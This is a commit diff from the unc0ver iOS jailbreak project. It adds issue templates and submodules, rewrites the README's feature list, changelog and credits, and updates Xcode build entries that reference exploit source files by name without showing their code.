Add issue_extension_for_mach_service

- Make _assert restore the saved errno
- Add unrestrict_process_with_task_port and revalidate_process_with_task_port
- Separate the jailbreak and the view controller
- Replace free with SafeFree and SafeFreeNULL
- Add a progress HUD
- Add assert-specific error messages
- Run uicache in root filesystem restore

.github/ISSUE_TEMPLATE/bug_report.md

@@ -0,0 +1,35 @@
+---
+name: Bug report
+about: Create a report to help us improve
+title: ''
+labels: bug
+assignees: ''
+
+---
+
+**Describe the bug**
+A clear and concise description of what the bug is and what you expected to happen.
+
+**To Reproduce**
+Steps to reproduce the behavior:
+1. Go to '...'
+2. Click on '....'
+3. Scroll down to '....'
+4. See error
+
+**Screenshots**
+If applicable, add screenshots to help explain your problem.
+
+**Device (please complete the following information):**
+ - iOS Version: 
+ - iOS Device: 
+ - unc0ver Version: 
+
+**Place an "x" between the brackets if true:**
+ - [ ] this is a bug others will be able to reproduce
+ - [ ] this issue is present with all tweaks uninstalled(except for default packages) or disabled
+ - [ ] this issue is present after a rootfs restore
+ - [ ] this issue is present on the latest version of unc0ver
+
+**Logs**
+If applicable, add logs or error messages here.

.github/ISSUE_TEMPLATE/feature_request.md

@@ -0,0 +1,17 @@
+---
+name: Feature request
+about: Suggest an idea for this project
+title: ''
+labels: enhancement
+assignees: ''
+
+---
+
+**Describe the feature you'd like**
+A clear and concise description of what you want to happen.
+
+**Describe alternatives you've considered**
+A clear and concise description of any alternative solutions or features you've considered.
+
+**Additional context**
+Add any other context or screenshots about the feature request here.

.gitmodules

@@ -7,3 +7,9 @@
 [submodule "patchfinder64"]
 	path = patchfinder64
 	url = https://github.com/pwn20wndstuff/patchfinder64.git
+[submodule "offset-cache"]
+	path = offset-cache
+	url = https://github.com/sbingner/offset-cache.git
+[submodule "kerneldec"]
+	path = kerneldec
+	url = https://github.com/sbingner/kerneldec.git

Makefile

@@ -6,7 +6,7 @@ all: clean
 	xcodebuild clean build CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO PRODUCT_BUNDLE_IDENTIFIER="science.xnu.undecimus" -sdk iphoneos -configuration Debug
 	ln -sf build/Debug-iphoneos Payload
 	# strip Payload/$(TARGET).app/$(TARGET)
-	ldid -SUndecimus/resources/multi_path.entitlements Payload/$(TARGET).app/$(TARGET)
+	ldid -SUndecimus/multi_path.entitlements Payload/$(TARGET).app/$(TARGET)
 	zip -r9 $(TARGET).ipa Payload/$(TARGET).app
 
 clean:

README.md

@@ -1,55 +1,42 @@
 # unc0ver
 ### The most advanced jailbreak tool
-![unc0ver logo](https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60%403x.png?token=AlyO4xDujoguob2DCFfUbNI8jO82OyCgks5bx5ZPwA%3D%3D)
+![unc0ver logo](https://github.com/pwn20wndstuff/Undecimus/raw/master/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60%403x.png)
 
 unc0ver jailbreak for iOS 11.0 - 12.1.2<br/>
 by [@pwn20wnd](https://twitter.com/Pwn20wnd) & [@sbingner](https://twitter.com/sbingner)<br/>
 UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](https://reddit.com/u/Samg_is_a_Ninja)<br/>
 
 ## The most outstanding changes over the other jailbreaks
-* All exploits in same app
-* Detailed error messages
-* Faster patches
-* More stable patches
-* No extra battery drain
-* No random freezes
-* No random slow downs
-* No data is logged or shared
-* No malware
-* Proper jailbreak state detection
-* Proper bootstrap extraction to fix issues such as Cydia not appearing after jailbreak
-* Native build of Cydia for iOS 11
-* Telesphoreo port for ARM64
-* Much faster Cydia
-* Much more stable Cydia
-* Much more modern looking and acting Cydia
-* Cydia skips uicache when not needed
-* Cydia supports iPhone X screen size
-* Cydia Substrate for tweak injection
-* Much faster ldrestart 
-* Much more stable ldrestart
-* Changes to Cydia were made with permission from Saurik 
-* Option to skip loading daemons
-* Option to dump APTicket
-* Option to refresh icon cache
-* Option to disable auto updates
-* Option to block app revokes
-* Option to restore RootFS
-* Button to restart device
-* Button to open Cydia in case it doesn't appear on the Home Screen
-* Label to show the days left till the application expires
-* Working debugserver
-* An awesome UI
+* One app to jailbreak all firmwares
+* Full-fledged Cydia and Substrate support for ARM64 devices
+* Full-fledged Telesphoreo port for ARM64 (Elucubratus)
+* No private data shared for diagnostics purposes
+* SSH-Only (Dropbear) support
+* Options for the user
+* Utilities for the user
+* No inefficient local jailbreak server (jailbreakd daemon)
+* Native Cydia support with support for the iPhone X screen size
+* Ability to rejailbreak from the jailbroken state
+* Stable kernelspace patches to avoid random crashes caused by kernel data aborts
+* Stable userspace patches to avoid random freezes and crashes caused by watchdog timer timeouts
+* Local APT repo system integrated in the jailbreak to verify the integrity of the core packages and repair them if they are corrupted
+* Extended and improved assertion to prevent unexpected results such as bootloops caused by filesystem corruption
+* Better system security, battery life and performance
+* Significantly faster Cydia
+* Modifications to Cydia were approved by the creator of Cydia (Saurik)
+* Fully working debugserver
+* No DRM
+* No installation restrictions
+* Open source
 
 ## Switching from the other jailbreaks
-* The RootFS will automatically be restored
+* Dedicated migration support will be used to switch without losing data
 
 ## Getting support
 * Use the built-in diagnostics tool
 * Tweet [@pwn20wnd](https://twitter.com/Pwn20wnd)
 
 ## Best practices
-* Perform a full restore with Rollectra before switching from the other jailbreaks
 * Turn on the AirPlane Mode before starting the jailbreak
 * Turn off Siri before starting the jailbreak
 
@@ -61,49 +48,23 @@ UI by [@DennisBednarz](https://twitter.com/DennisBednarz) & [Samg_is_a_Ninja](ht
 ## Video tutorial
 * <a href="https://youtu.be/TqHYjLHO0zs">https://youtu.be/TqHYjLHO0zs</a>
 
-## To Do List
-* Contact [@saurik](https://twitter.com/saurik) to enable the Cydia Store purchases on iOS 11 and remove the empty front page ads in Cydia: Partially done
-* Completely switch to Cydia Substrate and ditch Substitute: Done
-* Make switching from other jailbreaks without wiping the device possible: Done
-* Fix a kernel panic that's triggered by a kernel data abort which is caused by a UaF bug in jailbreakd: Done
-* Chain [@_bazad](https://twitter.com/_bazad)'s [blanket](https://github.com/bazad/blanket) to bypass the developer certificate requirement for multi_path: Almost done
-* Enable the on-fly entitlement patching on iOS 11: Work in progress
-* WebKit Port with [@_niklasb](https://twitter.com/_niklasb)'s [WebKit Exploit](https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1): Work in progress
-
 ## Screenshots
-<img src="https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Resources/Screenshot-1.PNG?token=AlyO4wXUInR6oHEgx0Tg31ri0t1q91frks5bx5ZbwA%3D%3D" width="281.25" height="609" /> <img src="https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Resources/Screenshot-2.PNG?token=AlyO48vs-YYcaKUgxXh8nIEUQQz_QEoqks5bx5ZqwA%3D%3D" width="281.25" height="609" /> <img src="https://raw.githubusercontent.com/pwn20wndstuff/Undecimus/master/Resources/Screenshot-3.PNG?token=AlyO44tYr5-jl7Pg0jup0tCqm3rSjUhiks5bx5Z4wA%3D%3D" width="281.25" height="609" />
+<img src="https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Screenshot-1.PNG" width="281.25" height="609" /> <img src="https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Screenshot-2.PNG" width="281.25" height="609" /> <img src="https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Screenshot-3.PNG" width="281.25" height="609" />
 
 ## Changelog
-* ~~rc1: Initial release~~
-* ~~rc2: Add the dynastic repo by default and fix a bug in firmware checker~~
-* ~~rc3: Add a switch to manually enable restoring RootFS, stop erasing user preferences when restoring RootFS and fix bugs~~
-* ~~rc4: Add a label to display the uptime, a label to display the app's version number, spawn to the PATH and stop bundling system fonts~~
-* ~~rc5: Run videosubscriptionsd in the jailed state, fix a bug in firmware and update checker~~
-* ~~rc6: Start logging again, improve update checker and fix multi_path~~
-* ~~rc7: Fix a bug in RootFS Restore and multi_path~~
-* ~~rc8: Fix a bug in RootFS Remount and add a work in progress warning for some firmwares~~
-* ~~rc9: Fix a bug in RootFS Remount, add even more detailed error messages and add a switch to increase the memory limit to improve the stability and improve the compatibility layer to work correctly with some tweaks that were specifically made for the other jailbreaks~~
-* ~~v1.0.0: Fix a bug in RootFS Restore and Remount, make the settings tab match with the rest of the UI and fix bugs~~
-* ~~v1.0.1: Disable the RootFS Restore for the unstable versions~~
-* ~~v1.0.2: Enable and fix the RootFS Restore for all versions~~
-* ~~v1.0.3: Fix the beta firmwares~~
-* ~~v1.1.0: Automatically select the best exploit, rewrite the versions checker, improve assertion, show the code which has failed in the error messages, improve memory management, optimize and clean up the code, fix the Storage settings, switch to a new technique to disable auto updates, remove so much useless logging, only set the boot-nonce if the switch is on without checking if it exists or not, log offsets, remove static sleeps to improve the speed, fix series of bugs and leave no known bug~~
-* ~~v1.1.1: Add a label to show the ECID and a button to open the source code, improve auto layout and fix various bugs in RootFS remount, RootFS restore, RootFS resource copier, Icon cache refresher, Version checker, Exploit selector, jailbreak state detector and others~~
-* ~~v1.1.2: Improve auto layout and code and Significantly improve Empty_List (VFS) exploit and slightly improve Multi_Path (MPTCP)~~
-* ~~v1.1.3: Fix a bug in starting jailbreakd~~
-* ~~v1.1.4: Fix a bug in finding offsets:  [Download (IPA)](https://github.com/pwn20wndstuff/Undecimus/raw/master/Resources/Undecimus.ipa)~~
-* Releases are now available at https://github.com/pwn20wndstuff/Undecimus/releases
+* Releases are available at https://github.com/pwn20wndstuff/Undecimus/releases (Note: rc1-v1.1.4 releases are no longer available)
 
 ## Special Thanks
 * [@i41nbeer](https://twitter.com/i41nbeer) for mach_portal, triple_fetch, async_wake, empty_list, multi_path and deja_xnu
-* [@Morpheus______](https://twitter.com/Morpheus______) for the QiLin Toolkit
+* [@bazad](https://twitter.com/bazad) for voucher_swap and PAC bypass
+* [@Morpheus______](https://twitter.com/Morpheus______) for the QiLin Toolkit (No longer used)
 * [@xerub](https://twitter.com/xerub) for libjb and the original patchfinder64
-* [@iBSparkes](https://twitter.com/iBSparkes) for the original amfid_payload, jailbreakd and pspawn_hook
+* [@iBSparkes](https://twitter.com/iBSparkes) for the original amfid_payload (No longer used), jailbreakd (No longer used), pspawn_hook (No longer used), machswap and machswap2
 * [@stek29](https://twitter.com/stek29) for the patchfinder64 additions, unlocknvram, host_get_special_port(4) patch and shenanigans bypass
 * [@theninjaprawn](https://twitter.com/theninjaprawn) for the patchfinder64 additions
 * [@saurik](https://twitter.com/saurik) for Cydia and Substrate
 * [@FCE365](https://twitter.com/FCE365) for the empty_list reliability improvements
-* [@tihmstar](https://twitter.com/tihmstar) for libgrabkernel, liboffsetfinder64 and v1ntex
+* [@tihmstar](https://twitter.com/tihmstar) for libgrabkernel (No longer used), liboffsetfinder64 (No longer used), v1ntex (No longer used) and v3ntex (No longer used)
 * Credits for [Undecimus-Resources](https://github.com/pwn20wndstuff/Undecimus-Resources)
 * [@coolstarorg](https://twitter.com/coolstarorg) for originally testing the snapshot rename idea on corellium
 * [@Cryptiiiic](https://twitter.com/Cryptiiiic) for testing

Undecimus.xcodeproj/project.pbxproj

@@ -8,13 +8,14 @@
 
 /* Begin PBXBuildFile section */
 		2101395521A09BB700F9C5F2 /* hideventsystem.c in Sources */ = {isa = PBXBuildFile; fileRef = 2101395321A09BB700F9C5F2 /* hideventsystem.c */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
-		2116449A21737F9500250744 /* JailbreakViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6E21369EB700849420 /* JailbreakViewController.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function -Wno-deprecated-declarations"; }; };
+		2116449A21737F9500250744 /* JailbreakViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6E21369EB700849420 /* JailbreakViewController.m */; };
 		212D8844216E4C4800A36DA5 /* find_port.c in Sources */ = {isa = PBXBuildFile; fileRef = 212D8842216E4C4700A36DA5 /* find_port.c */; };
 		212D8847216E4DF600A36DA5 /* early_kalloc.c in Sources */ = {isa = PBXBuildFile; fileRef = 212D8846216E4DF600A36DA5 /* early_kalloc.c */; };
 		212D884A216E4EBF00A36DA5 /* async_wake.c in Sources */ = {isa = PBXBuildFile; fileRef = 212D8849216E4EBE00A36DA5 /* async_wake.c */; };
 		213E78262208654700FDF3B7 /* necp.c in Sources */ = {isa = PBXBuildFile; fileRef = 213E78252208654700FDF3B7 /* necp.c */; settings = {COMPILER_FLAGS = "-Wno-deprecated-declarations"; }; };
 		213E7828220865A100FDF3B7 /* voucher_swap-poc.c in Sources */ = {isa = PBXBuildFile; fileRef = 213E7827220865A100FDF3B7 /* voucher_swap-poc.c */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
-		214D283C22146EC70058933D /* libmagic.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 214D283B22146EC70058933D /* libmagic.a */; };
+		214A1776224EBE5400588EC4 /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 214A1773224EBE5400588EC4 /* lzssdec.cpp */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
+		214A1777224EBE5400588EC4 /* kerneldec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 214A1774224EBE5400588EC4 /* kerneldec.cpp */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
 		2150A9CD22021330001C8677 /* voucher_swap.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9CC22021330001C8677 /* voucher_swap.c */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
 		2150A9DC22021348001C8677 /* log.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9CE22021347001C8677 /* log.c */; };
 		2150A9DD22021348001C8677 /* platform_match.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9CF22021347001C8677 /* platform_match.c */; };
@@ -23,39 +24,40 @@
 		2150A9E022021348001C8677 /* parameters.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9D922021348001C8677 /* parameters.c */; };
 		2150A9E122021348001C8677 /* kernel_alloc.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DA22021348001C8677 /* kernel_alloc.c */; };
 		2150A9E222021348001C8677 /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 2150A9DB22021348001C8677 /* kernel_memory.c */; };
-		2166453D22257E7900B37252 /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2166453B22257E7900B37252 /* lzssdec.cpp */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
-		216FDA04220C5BA90086D802 /* libfragmentzip.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 216FDA03220C5BA90086D802 /* libfragmentzip.a */; };
-		216FDA08220C5BDC0086D802 /* libgrabkernel.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 216FDA07220C5BDC0086D802 /* libgrabkernel.a */; };
-		216FDA0D220C5C320086D802 /* libplist.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 216FDA0B220C5C320086D802 /* libplist.a */; };
-		216FDA0E220C5C320086D802 /* libplist++.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 216FDA0C220C5C320086D802 /* libplist++.a */; };
-		216FDA10220C5C3E0086D802 /* libimg4tool.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 216FDA0F220C5C3E0086D802 /* libimg4tool.a */; };
-		216FDA12220C5C530086D802 /* liboffsetfinder64.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 216FDA11220C5C530086D802 /* liboffsetfinder64.a */; };
-		216FDA1A220C5EAD0086D802 /* libcurl.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 216FDA19220C5EAD0086D802 /* libcurl.a */; };
+		216F3F3D2228776E007DC1BC /* kernel_call.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F362228776D007DC1BC /* kernel_call.c */; };
+		216F3F3E2228776E007DC1BC /* user_client.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F372228776D007DC1BC /* user_client.c */; };
+		216F3F3F2228776E007DC1BC /* pac.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F3A2228776D007DC1BC /* pac.c */; };
+		216F3F402228776E007DC1BC /* kc_parameters.c in Sources */ = {isa = PBXBuildFile; fileRef = 216F3F3C2228776E007DC1BC /* kc_parameters.c */; };
 		216FDA1E220C5F5C0086D802 /* libz.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 216FDA1D220C5F5C0086D802 /* libz.tbd */; };
-		216FDA22220C62C80086D802 /* v1ntex_offsets.mm in Sources */ = {isa = PBXBuildFile; fileRef = 216FDA20220C62C80086D802 /* v1ntex_offsets.mm */; };
-		216FDA25220C68A60086D802 /* v1ntex_exploit.m in Sources */ = {isa = PBXBuildFile; fileRef = 216FDA24220C68A60086D802 /* v1ntex_exploit.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
 		2170BD3B21B193800059BD10 /* libMobileGestalt.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 211D0D84218DEF3E008745D8 /* libMobileGestalt.tbd */; };
 		2170BDCD21B332FC0059BD10 /* SpringBoardServices.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 21C0FC902136A46500849420 /* SpringBoardServices.framework */; };
 		2171C4012222E3BB004E45C7 /* SystemConfiguration.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */; };
+		2199B8E9226B40C600A8255D /* kalloc_crash.c in Sources */ = {isa = PBXBuildFile; fileRef = 2199B8E8226B40C600A8255D /* kalloc_crash.c */; };
+		219C90A0228703DA00AFA38A /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = 219C909F228703DA00AFA38A /* jailbreak.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function -Wno-deprecated-declarations"; }; };
 		21A97FD02148103C00DC0023 /* remote_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FC62148103B00DC0023 /* remote_memory.c */; };
 		21A97FD12148103C00DC0023 /* KernelExecution.m in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FC82148103B00DC0023 /* KernelExecution.m */; };
-		21A97FD32148103C00DC0023 /* KernelUtilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FCC2148103B00DC0023 /* KernelUtilities.c */; };
+		21A97FD32148103C00DC0023 /* KernelUtilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FCC2148103B00DC0023 /* KernelUtilities.c */; settings = {COMPILER_FLAGS = "-Wno-deprecated-declarations"; }; };
 		21A97FD42148103C00DC0023 /* remote_call.c in Sources */ = {isa = PBXBuildFile; fileRef = 21A97FCD2148103B00DC0023 /* remote_call.c */; };
+		21B421902261302F004C17CD /* MobileCoreServices.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 21B4218F2261302F004C17CD /* MobileCoreServices.framework */; };
+		21BB9804222F05C40012AF40 /* machswap2_pwn.m in Sources */ = {isa = PBXBuildFile; fileRef = 21BB9802222F05C40012AF40 /* machswap2_pwn.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
 		21C0FC6C21369EB700849420 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC6B21369EB700849420 /* AppDelegate.m */; };
 		21C0FC7421369EB800849420 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7321369EB800849420 /* Assets.xcassets */; };
 		21C0FC7721369EB800849420 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 21C0FC7521369EB800849420 /* LaunchScreen.storyboard */; };
 		21C0FC7A21369EB800849420 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC7921369EB800849420 /* main.m */; };
 		21C0FC8721369EE900849420 /* KernelMemory.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8021369EE900849420 /* KernelMemory.c */; };
-		21C0FC8A21369EE900849420 /* KernelStructureOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8621369EE900849420 /* KernelStructureOffsets.m */; };
+		21C0FC8A21369EE900849420 /* KernelOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8621369EE900849420 /* KernelOffsets.m */; };
 		21C130E0214BC2880021AA9D /* unlocknvram.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C130DE214BC2880021AA9D /* unlocknvram.c */; };
 		21C130EB214C03690021AA9D /* CreditsTableViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C130EA214C03690021AA9D /* CreditsTableViewController.m */; };
 		21C13119214D268F0021AA9D /* multi_path_sploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C13117214D268F0021AA9D /* multi_path_sploit.c */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
 		21C1312F214E69F80021AA9D /* empty_list_sploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 21C0FC8521369EE900849420 /* empty_list_sploit.c */; settings = {COMPILER_FLAGS = "-Wno-everything"; }; };
-		21E4052D2215E543006065CE /* v3ntex_exploit.m in Sources */ = {isa = PBXBuildFile; fileRef = 21E4052C2215E543006065CE /* v3ntex_exploit.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
+		21CC3905227CDFDE0072D572 /* prefs.m in Sources */ = {isa = PBXBuildFile; fileRef = 21CC3902227CDFDE0072D572 /* prefs.m */; };
+		21CC3906227CDFDE0072D572 /* diagnostics.m in Sources */ = {isa = PBXBuildFile; fileRef = 21CC3903227CDFDE0072D572 /* diagnostics.m */; };
 		21F4D70E21FC7A590070D5E0 /* patchfinder64.c in Sources */ = {isa = PBXBuildFile; fileRef = 21F4D70C21FC7A590070D5E0 /* patchfinder64.c */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
-		21FED6AB2168F8060024BC95 /* SettingsTableViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C130E5214BDDE20021AA9D /* SettingsTableViewController.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
+		21FED6AB2168F8060024BC95 /* SettingsTableViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 21C130E5214BDDE20021AA9D /* SettingsTableViewController.m */; };
+		21FF63CB224E5FDC008B76D9 /* offsetcache.c in Sources */ = {isa = PBXBuildFile; fileRef = 21FF63C9224E5FDC008B76D9 /* offsetcache.c */; };
+		21FFE0F8222E4C0600EC59B2 /* machswap_offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 21FFE0F6222E4C0600EC59B2 /* machswap_offsets.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
+		21FFE0F9222E4C0600EC59B2 /* machswap_pwn.m in Sources */ = {isa = PBXBuildFile; fileRef = 21FFE0F7222E4C0600EC59B2 /* machswap_pwn.m */; settings = {COMPILER_FLAGS = "-Wno-unused-variable -Wno-unused-function"; }; };
 		222AD59321FA731800DCBA2A /* FakeApt.m in Sources */ = {isa = PBXBuildFile; fileRef = 222AD59221FA731800DCBA2A /* FakeApt.m */; };
-		2253F711221020EB0031D809 /* libmagic.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 2253F710221020EA0031D809 /* libmagic.a */; };
 		225D142221E052960045493D /* ArchiveFile.m in Sources */ = {isa = PBXBuildFile; fileRef = 225D142121E052960045493D /* ArchiveFile.m */; };
 		226689DD21EC1C5A00262F66 /* libarchive.2.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = 226689DC21EC1C5A00262F66 /* libarchive.2.tbd */; };
 		22C546AB21A8A8FD00EFC09C /* utils.m in Sources */ = {isa = PBXBuildFile; fileRef = 22C546AA21A8A8FD00EFC09C /* utils.m */; };
@@ -84,8 +86,10 @@
 		213E78252208654700FDF3B7 /* necp.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = necp.c; sourceTree = "<group>"; };
 		213E7827220865A100FDF3B7 /* voucher_swap-poc.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = "voucher_swap-poc.c"; sourceTree = "<group>"; };
 		213E7829220865BF00FDF3B7 /* voucher_swap-poc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "voucher_swap-poc.h"; sourceTree = "<group>"; };
-		214D283B22146EC70058933D /* libmagic.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libmagic.a; sourceTree = "<group>"; };
-		214D283D22146EE60058933D /* magic.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = magic.h; sourceTree = "<group>"; };
+		214A1772224EBE5400588EC4 /* kerneldec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = kerneldec.h; path = kerneldec/kerneldec.h; sourceTree = SOURCE_ROOT; };
+		214A1773224EBE5400588EC4 /* lzssdec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; name = lzssdec.cpp; path = kerneldec/lzssdec.cpp; sourceTree = SOURCE_ROOT; };
+		214A1774224EBE5400588EC4 /* kerneldec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; name = kerneldec.cpp; path = kerneldec/kerneldec.cpp; sourceTree = SOURCE_ROOT; };
+		214A1775224EBE5400588EC4 /* lzssdec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = lzssdec.h; path = kerneldec/lzssdec.h; sourceTree = SOURCE_ROOT; };
 		2150A9CB22021330001C8677 /* voucher_swap.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = voucher_swap.h; sourceTree = "<group>"; };
 		2150A9CC22021330001C8677 /* voucher_swap.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = voucher_swap.c; sourceTree = "<group>"; };
 		2150A9CE22021347001C8677 /* log.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = log.c; sourceTree = "<group>"; };
@@ -105,28 +109,21 @@
 		2150A9E322021381001C8677 /* mach_vm.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mach_vm.h; sourceTree = "<group>"; };
 		2150A9E422021381001C8677 /* ipc_port.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_port.h; sourceTree = "<group>"; };
 		2150A9E52202138A001C8677 /* IOKitLib.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOKitLib.h; sourceTree = "<group>"; };
-		2166453B22257E7900B37252 /* lzssdec.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = lzssdec.cpp; sourceTree = "<group>"; };
-		2166453C22257E7900B37252 /* lzssdec.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = lzssdec.h; sourceTree = "<group>"; };
-		216FDA03220C5BA90086D802 /* libfragmentzip.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libfragmentzip.a; sourceTree = "<group>"; };
-		216FDA06220C5BB80086D802 /* libfragmentzip.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = libfragmentzip.h; sourceTree = "<group>"; };
-		216FDA07220C5BDC0086D802 /* libgrabkernel.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libgrabkernel.a; sourceTree = "<group>"; };
-		216FDA0A220C5BE50086D802 /* libgrabkernel.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = libgrabkernel.h; sourceTree = "<group>"; };
-		216FDA0B220C5C320086D802 /* libplist.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libplist.a; sourceTree = "<group>"; };
-		216FDA0C220C5C320086D802 /* libplist++.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = "libplist++.a"; sourceTree = "<group>"; };
-		216FDA0F220C5C3E0086D802 /* libimg4tool.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libimg4tool.a; sourceTree = "<group>"; };
-		216FDA11220C5C530086D802 /* liboffsetfinder64.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = liboffsetfinder64.a; sourceTree = "<group>"; };
-		216FDA14220C5C620086D802 /* insn.hpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.h; path = insn.hpp; sourceTree = "<group>"; };
-		216FDA15220C5C620086D802 /* liboffsetfinder64.hpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.h; path = liboffsetfinder64.hpp; sourceTree = "<group>"; };
-		216FDA16220C5C620086D802 /* patch.hpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.h; path = patch.hpp; sourceTree = "<group>"; };
-		216FDA17220C5C620086D802 /* liboffsetfinder64_common.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = liboffsetfinder64_common.h; sourceTree = "<group>"; };
-		216FDA18220C5C620086D802 /* exception.hpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.h; path = exception.hpp; sourceTree = "<group>"; };
-		216FDA19220C5EAD0086D802 /* libcurl.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libcurl.a; sourceTree = "<group>"; };
